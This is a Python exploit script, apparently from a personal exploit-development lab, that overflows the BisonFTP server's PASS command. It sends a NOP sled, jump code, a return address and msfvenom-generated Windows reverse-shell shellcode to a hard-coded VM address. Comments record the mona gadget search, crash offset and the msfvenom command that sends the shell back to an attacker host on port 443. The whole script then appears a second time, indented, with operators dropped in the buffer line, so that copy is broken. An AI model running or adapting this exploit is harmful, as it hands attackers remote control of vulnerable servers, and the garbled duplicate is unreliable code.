BillRizer/exploit-bison.py

## exploit-bison.py
#!/usr/bin/python
import socket,time

#jump memory code
jmp = "\x83\xEB\x32"*8
jmp += "\xff\xe3"

#exploit code
buf =  ""
buf += "\xbe\xa8\x9a\x2c\x48\xda\xce\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x75\x0e\x03\xdd\x94\xce"
buf += "\xbd\xe1\x41\x8c\x3e\x19\x92\xf1\xb7\xfc\xa3\x31\xa3"
buf += "\x75\x93\x81\xa7\xdb\x18\x69\xe5\xcf\xab\x1f\x22\xe0"
buf += "\x1c\x95\x14\xcf\x9d\x86\x65\x4e\x1e\xd5\xb9\xb0\x1f"
buf += "\x16\xcc\xb1\x58\x4b\x3d\xe3\x31\x07\x90\x13\x35\x5d"
buf += "\x29\x98\x05\x73\x29\x7d\xdd\x72\x18\xd0\x55\x2d\xba"
buf += "\xd3\xba\x45\xf3\xcb\xdf\x60\x4d\x60\x2b\x1e\x4c\xa0"
buf += "\x65\xdf\xe3\x8d\x49\x12\xfd\xca\x6e\xcd\x88\x22\x8d"
buf += "\x70\x8b\xf1\xef\xae\x1e\xe1\x48\x24\xb8\xcd\x69\xe9"
buf += "\x5f\x86\x66\x46\x2b\xc0\x6a\x59\xf8\x7b\x96\xd2\xff"
buf += "\xab\x1e\xa0\xdb\x6f\x7a\x72\x45\x36\x26\xd5\x7a\x28"
buf += "\x89\x8a\xde\x23\x24\xde\x52\x6e\x21\x13\x5f\x90\xb1"
buf += "\x3b\xe8\xe3\x83\xe4\x42\x6b\xa8\x6d\x4d\x6c\xcf\x47"
buf += "\x29\xe2\x2e\x68\x4a\x2b\xf5\x3c\x1a\x43\xdc\x3c\xf1"
buf += "\x93\xe1\xe8\x56\xc3\x4d\x43\x17\xb3\x2d\x33\xff\xd9"
buf += "\xa1\x6c\x1f\xe2\x6b\x05\x8a\x19\xfc\xea\xe3\x38\xfa"
buf += "\x82\xf1\x3a\x03\xe8\x7f\xdc\x69\x1e\xd6\x77\x06\x87"
buf += "\x73\x03\xb7\x48\xae\x6e\xf7\xc3\x5d\x8f\xb6\x23\x2b"
buf += "\x83\x2f\xc4\x66\xf9\xe6\xdb\x5c\x95\x65\x49\x3b\x65"
buf += "\xe3\x72\x94\x32\xa4\x45\xed\xd6\x58\xff\x47\xc4\xa0"
buf += "\x99\xa0\x4c\x7f\x5a\x2e\x4d\xf2\xe6\x14\x5d\xca\xe7"
buf += "\x10\x09\x82\xb1\xce\xe7\x64\x68\xa1\x51\x3f\xc7\x6b"
buf += "\x35\xc6\x2b\xac\x43\xc7\x61\x5a\xab\x76\xdc\x1b\xd4"
buf += "\xb7\x88\xab\xad\xa5\x28\x53\x64\x6e\x48\xb6\xac\x9b"
buf += "\xe1\x6f\x25\x26\x6c\x90\x90\x65\x89\x13\x10\x16\x6e"
buf += "\x0b\x51\x13\x2a\x8b\x8a\x69\x23\x7e\xac\xde\x44\xab"

buffer ="\x90"*(1115 - len(buf)) + buf + "B"* (40 - len(jmp)) + jmp+"\x8f\xe8\xb1\x7c"

soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 192.168.25.27 -> VM server ftp ip
soc.connect(("192.168.25.27",21))
time.sleep(1)
r = soc.recv(2048)
soc.send("USER anonymous\r\n")
r = soc.recv(1024)
soc.send("PASS "+buffer+"\r\n")
r = soc.recv(1024)

# helper:
# !mona find -s "\xff\xe4" -m bisonftp.exe
# 0040307D   . FFE3           JMP EBX
# 7CB1E88F   FFE3             JMP EBX  -- system32
# crash 1200
# pattern_offset = 42356D42 -> 1155 pos
# this exploit connect in reverse shell

# change the IP ;)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.6 LPORT=443 -b "\x00\x0a\x0d\x20\x40" EXITFUNC=thread -f python
	#!/usr/bin/python
	import socket,time

	#jump memory code
	jmp = "\x83\xEB\x32"*8
	jmp += "\xff\xe3"

	#exploit code
	buf = ""
	buf += "\xbe\xa8\x9a\x2c\x48\xda\xce\xd9\x74\x24\xf4\x5d\x31"
	buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x75\x0e\x03\xdd\x94\xce"
	buf += "\xbd\xe1\x41\x8c\x3e\x19\x92\xf1\xb7\xfc\xa3\x31\xa3"
	buf += "\x75\x93\x81\xa7\xdb\x18\x69\xe5\xcf\xab\x1f\x22\xe0"
	buf += "\x1c\x95\x14\xcf\x9d\x86\x65\x4e\x1e\xd5\xb9\xb0\x1f"
	buf += "\x16\xcc\xb1\x58\x4b\x3d\xe3\x31\x07\x90\x13\x35\x5d"
	buf += "\x29\x98\x05\x73\x29\x7d\xdd\x72\x18\xd0\x55\x2d\xba"
	buf += "\xd3\xba\x45\xf3\xcb\xdf\x60\x4d\x60\x2b\x1e\x4c\xa0"
	buf += "\x65\xdf\xe3\x8d\x49\x12\xfd\xca\x6e\xcd\x88\x22\x8d"
	buf += "\x70\x8b\xf1\xef\xae\x1e\xe1\x48\x24\xb8\xcd\x69\xe9"
	buf += "\x5f\x86\x66\x46\x2b\xc0\x6a\x59\xf8\x7b\x96\xd2\xff"
	buf += "\xab\x1e\xa0\xdb\x6f\x7a\x72\x45\x36\x26\xd5\x7a\x28"
	buf += "\x89\x8a\xde\x23\x24\xde\x52\x6e\x21\x13\x5f\x90\xb1"
	buf += "\x3b\xe8\xe3\x83\xe4\x42\x6b\xa8\x6d\x4d\x6c\xcf\x47"
	buf += "\x29\xe2\x2e\x68\x4a\x2b\xf5\x3c\x1a\x43\xdc\x3c\xf1"
	buf += "\x93\xe1\xe8\x56\xc3\x4d\x43\x17\xb3\x2d\x33\xff\xd9"
	buf += "\xa1\x6c\x1f\xe2\x6b\x05\x8a\x19\xfc\xea\xe3\x38\xfa"
	buf += "\x82\xf1\x3a\x03\xe8\x7f\xdc\x69\x1e\xd6\x77\x06\x87"
	buf += "\x73\x03\xb7\x48\xae\x6e\xf7\xc3\x5d\x8f\xb6\x23\x2b"
	buf += "\x83\x2f\xc4\x66\xf9\xe6\xdb\x5c\x95\x65\x49\x3b\x65"
	buf += "\xe3\x72\x94\x32\xa4\x45\xed\xd6\x58\xff\x47\xc4\xa0"
	buf += "\x99\xa0\x4c\x7f\x5a\x2e\x4d\xf2\xe6\x14\x5d\xca\xe7"
	buf += "\x10\x09\x82\xb1\xce\xe7\x64\x68\xa1\x51\x3f\xc7\x6b"
	buf += "\x35\xc6\x2b\xac\x43\xc7\x61\x5a\xab\x76\xdc\x1b\xd4"
	buf += "\xb7\x88\xab\xad\xa5\x28\x53\x64\x6e\x48\xb6\xac\x9b"
	buf += "\xe1\x6f\x25\x26\x6c\x90\x90\x65\x89\x13\x10\x16\x6e"
	buf += "\x0b\x51\x13\x2a\x8b\x8a\x69\x23\x7e\xac\xde\x44\xab"

	buffer ="\x90"(1115 - len(buf)) + buf + "B" (40 - len(jmp)) + jmp+"\x8f\xe8\xb1\x7c"

	soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	# 192.168.25.27 -> VM server ftp ip
	soc.connect(("192.168.25.27",21))
	time.sleep(1)
	r = soc.recv(2048)
	soc.send("USER anonymous\r\n")
	r = soc.recv(1024)
	soc.send("PASS "+buffer+"\r\n")
	r = soc.recv(1024)

	# helper:
	# !mona find -s "\xff\xe4" -m bisonftp.exe
	# 0040307D . FFE3 JMP EBX
	# 7CB1E88F FFE3 JMP EBX -- system32
	# crash 1200
	# pattern_offset = 42356D42 -> 1155 pos
	# this exploit connect in reverse shell

	# change the IP ;)
	# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.6 LPORT=443 -b "\x00\x0a\x0d\x20\x40" EXITFUNC=thread -f python